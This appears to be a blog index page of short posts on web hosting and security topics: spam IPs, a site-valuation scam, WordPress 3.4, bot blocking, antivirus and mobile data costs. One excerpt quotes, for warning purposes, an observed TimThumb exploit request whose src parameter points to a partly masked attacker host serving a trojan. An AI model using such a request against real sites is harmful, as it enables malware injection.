MWEB IPs used by Spammers and Hackers
Checking an IP record for 188.8.131.52 after noticing a minor offence this morning – the ubiquitous and quite stupid practice of adding “/undefined” to the end of actual URLs – brought up a list of IPs in the neighbourhood. All the IP’s included below belong to MWEB. (whois.domaintools.com IP lookup records.)
MWEB, a South African Internet Service Provider, has previously had IP’s under their control listed in several databases as a source of spam e-mails. According to Project Honeypot a range of IP’s managed by MWEB is (or was) used by Spammers and Dictionary Attackers.
False Valuation by Pansee.com
Ever had a site valuation by pansee.com – I got sent a mail informing me ‘someone’ had conducted a valuation of my website graphicline.co.za using pansee.com valuation tools, with a link to the valuation report. Interested to see what the report contained, I checked if Google had any information about malware on the site, then visited the page.
The valuation report had some interesting data. From the country where most of the website traffic is derived from, to number of daily visitors. And a claim to the value of advertising on the front page.
France is the Biggest Source of Traffic
This amused me… According to pansee.com, 12.2 percent of my traffic comes from France, while the USA only accounts for 8.1%
Update to WordPress 3.4
WordPress 3.4 was released to the public a few days ago. WP 3.4 has been in Beta testing for quite some time, so most bugs should have been discovered and fixed by now – and so they are. The list of known issues is short (Troubleshooting WordPress 3.4 – Master List). More issues have been reported with the latest default theme (TwentyEleven) version, and with the JetPack version update released at the same time than with WP 3.4 core.
Should we update our WordPress installations? Generally the answer is yes. It is always a good idea to keep WordPress up to date, however the update should be approached with a degree of caution. Some plugins may not work with the latest version of WP, some themes may also have problems. So before updating let’s consider a few things if the update causes problems, or even worse a broken site.
What is Markmonitor.com?
Markmonitor.com is a company providing brand protection to (mainly) global brands.
Markmonitor monitors the Internet (supposedly) looking for brand-piracy, domain name hijacking and counterfeiting (of branded goods) among it’s range of client services. The company must use search spiders to trawl websites looking for this information.
They also have another side of business, as a domain registrar, and a number of large corporations including Apple.com have their domains under their ambit.
Baidu and Yandex Bots Forbidden Access
That’s it folk, I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, I don’t want them crawling my clients’ sites (unless the client wants them to of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback urls thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, eg “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
Data Bundle Overload: End to Free Mobile Data
It looks like mobile data users at the Southern tip of Africa are not the only ones looking at paying high prices for data bundles (or buckets as they are known in some locales). The USA is joining the trend of charging for mobile data. Down South we have never known the privilege of free mobile data, having some of the highest data cost per GB in the world – at least when compared to first world civilisation.
The Data Crunch
The end of free mobile data is no real surprise. The RF frequencies used to carry this traffic are limited in capacity, new compression technology can only go so far to reduce the load on these channels. Urguably more frequencies could be made available, however these would have to be in higher frequency bands than are currently used. Increasing RF frequency brings it’s own problems – higher frequencies (into the mid and high Ghz region) suffer more loss from inclement weather signal absorption from structures, components cost more, and we have to consider the human health related dangers of microwave radiation.